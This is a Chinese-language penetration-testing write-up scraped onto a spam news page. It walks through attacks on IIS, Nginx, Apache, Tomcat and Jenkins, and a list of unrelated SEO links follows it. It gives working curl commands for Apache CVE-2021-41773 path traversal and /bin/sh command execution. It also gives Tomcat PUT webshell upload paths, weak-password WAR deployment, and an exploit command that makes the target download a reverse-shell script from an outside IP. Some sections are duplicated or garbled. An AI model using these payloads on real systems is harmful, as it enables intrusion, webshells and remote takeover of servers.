当前位置: 首页 > news >正文

有哪些网站做任务有佣金建设银行手机网站首页

有哪些网站做任务有佣金,建设银行手机网站首页,做策划的人经常浏览的网站,WordPress设置评论通过IIS IIS短文件漏洞 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。 利用工具 https…IIS IIS短文件漏洞 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。 利用工具 https://github.com/irsdl/IIS-ShortName-Scanner https://github.com/lijiejie/IIS_shortname_Scanner IIS文件解析漏洞 IIS 6 解析漏洞 该版本默认会将*.asp;.jpg 此种格式的文件名当成Asp解析 该版本默认会将*.asp/目录下的所有文件当成Asp解析 如logo.asp;.jpg xx.asp/logo.jpg IIS 7.x 解析漏洞 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件应用场景配合文件上传获取Webshell Nginx DNS解析漏洞cve-2021-23017 受影响版本0.6.18-1.20.0 **poc地址**https://github.com/M507/CVE-2021-23017-PoC 复现失败 文件名逻辑漏洞cve-2013-4547 受影响版本0.8.41 ~ 1.4.3 /1.5.0 ~ 1.5.7 \0也就是c语言的结束符的意思之后我们的通过我们的\0将这个文件名截断成我们的fastcgi认为他到1.gif就结束了之后对上传的文件进行检查发现他没有以php结尾就将这个文件上传上去然后我们的php-fpm.conf的安全后缀策略security.limit_extensions 是空的之后他就会执行我们上传的1.gif \0.php文件。 测试 测试 成功 解析漏洞配置不当 我们在配置php.ini的时候开启了我们的自动修复路径cgi.fix_pathinfo1也就是我们访问http://127.0.0.1/test.jpg/test.php,由于没有test.php这个文件我们服务器会自动到上一个路径发现有test.jpg于是就自己执行了这个文件但是由于我们在配置php-fpm.conf的安全后缀策略security.limit_extensions jpg php )为空或者就只有jpg和php,我们的服务就会执行jpg和php我们的test.jpg里面就是我们的恶意的php代码之后通过解析为php文件就导致了我们执行该文件从而产生了我们的漏洞。 假如下图是上传了包含?phpinfo();?的图片 在后面添加/.php后缀就会被解析为php Apache 目录穿越命令执行(cve-2021-41773) 版本影响2.4.49、2.4.50 可见靶场的apache版本满足漏洞版本 目录穿越 curl -v --path-as-is http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd RCE curl --data “echo;id” http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 文件解析cve-2017-15715 版本影响2.4.0-2.4.29 上传成功 Tomcat 弱口令getshell 影响版本全版本 弱口令部署war包getshell 点击【manager app】弹出后台登录框 抓包爆破 标记加密的位置 选择自定义迭代器 位置一填用户名 位置二填: 位置三填密码 payload处理选择base64加密 爆破成功 用户名tomcat 密码qwe123 登录成功 生成jsp一句话木马 将jsp木马zip压缩后更改后缀为war 生成war包 部署war包 链接成功 文件上传cve-2017-12615 影响版本7.0.0-7.0.81 使用PUT方法请求 将木马放入数据内即可上传 三种构造url方式 PUT /x.jsp/ PUT /x.jsp%20 PUT /x.jsp::$DATA 前两种针对linux 第三种针对windows 返回201即是上传成功 文件包含cve-2020-1938 影响版本6.* 、7.*7.0.100、8.*8.5.51、9.*9.0.31 工具https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 读取WEB-INF/web.xml文件 Weblogic 默认端口7001 weblogic由于有很多漏洞所以直接梭哈 工具地址https://github.com/KimJun1010/WeblogicTool Jenkins 默认端口8080 Jenkins-CI远程代码执行(cve-2017-1000353) 影响版本Jenkins 2.56 Jenkins LTS 2.46.1 默认端口7001 weblogic由于有很多漏洞所以直接梭哈 工具地址https://github.com/KimJun1010/WeblogicTool 再使用python的exp执行 shell反弹成功 远程命令执行cve-2018-1000861 影响版本Jenkins 2.153 Jenkins LTS 2.138.3 工具下载https://github.com/orangetw/awesome-jenkins-rce-2019 先将反弹shell的命令放在自己公网服务器上 python2 exp.py http://123.58.224.8:31731 “curl -o /tmp/1.sh http://117.72.120.22/qdy.txt” 可以看见qdy.txt文件被目标服务器请求了 执行反弹shell命令 成功接收shell
http://www.yingshimen.cn/news/87562/

相关文章:

  • 网站建设合同 完整版wordpress 支持 插件下载
  • 促销直播网站开发中国十大装修公司品牌排行榜
  • 电子商务网站开发项目设计报告昆山市做网站的公司
  • 亚马逊企业网站建设wordpress访问
  • 十堰微网站建设多少钱柳州企业网站开发公司
  • wordpress 描文本优化湖南纯手工seo电话
  • 行政单位门户网站建设方案企业网络专线
  • ps如何做网站轮播图网上购物系统建设
  • 网站被黑应该怎么做励志网站织梦源码
  • 企业网站强制备案自设计网站
  • 通州网站建设公司阿里巴巴免费做国际网站
  • 网站建设升级的必要性最低价做网站
  • 投票网站怎么做江门网站建设哪家快
  • 2个域名指向同一个网站网站不支持m.域名
  • 高端网站建设页面wordpress付费开通站点
  • 珠海网站建设黄荣wordpress生成
  • 网站开发一个支付功能要好多钱网站建设步骤实践报告
  • 网站更换备案昆山正规网站建设
  • 网站建设邀标函搭建wap网站
  • 单页营销网站怎么做黄骅港赶海免费最佳地点是哪里
  • 网站开发商品管理表字段小程序制作价格北京华网天下实惠
  • 为企业做网站策划案怎么看网站开发者页面
  • 手机网站微信网站开发wordpress自适应主题
  • 无锡网站建设解决方案做网站的经历感想
  • 广州海珠网站建设宁波手机网站制作
  • 做门窗接活的网站专业做网站 郑州
  • 烟台建设信息网站我看别人做系统就直接网站下载软件
  • 企业网站图片渐变效果怎么做中山网站排名推广
  • 深圳专业做网站排名哪家好网页版梦幻西游周游方壶
  • 网站前端代码有哪些问题购物网站的建设费用